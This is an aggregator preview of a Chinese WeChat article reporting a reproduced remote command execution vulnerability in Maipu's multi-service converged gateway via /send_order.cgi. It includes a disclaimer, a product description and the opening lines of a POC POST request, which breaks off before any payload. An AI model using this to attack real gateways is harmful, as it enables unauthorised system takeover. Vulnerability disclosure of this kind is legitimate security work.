今天看啥  ›  专栏  ›  阿乐你好

【成功复现】迈普多业务融合网关远程命令执行漏洞

阿乐你好  · 公众号  ·  · 2024-06-26 13:44

文章预览

网安引领时代,弥天点亮未来       0x00写在前面       本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责! 0x01漏洞介绍 迈普通信技术股份有限公司成立于1993年,是国内领先的网络产品及解决方案供应商 。 迈普多业务融合网关拥有融合网关功能、精准流控、上网行为管理、智能选路…等强大功能,并支持对接迈普云平台,实现远程运维和集中管理,很好的满足了医疗/教育等场景要求的全面一体化的网络需求。其接口/send_order.cgi存在远程命令执行漏洞,攻击者可通过该漏洞获取系统权限。 0x02影响版本 迈普多业务融合网关 0x03漏洞复现 1.访问漏洞环境 2.对漏洞进行复现   POC (POST) 漏洞复现 POST /send_order.cgi?parameter=operation HTTP/1.1 Host : 127.0.0.1 User-Agent : Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览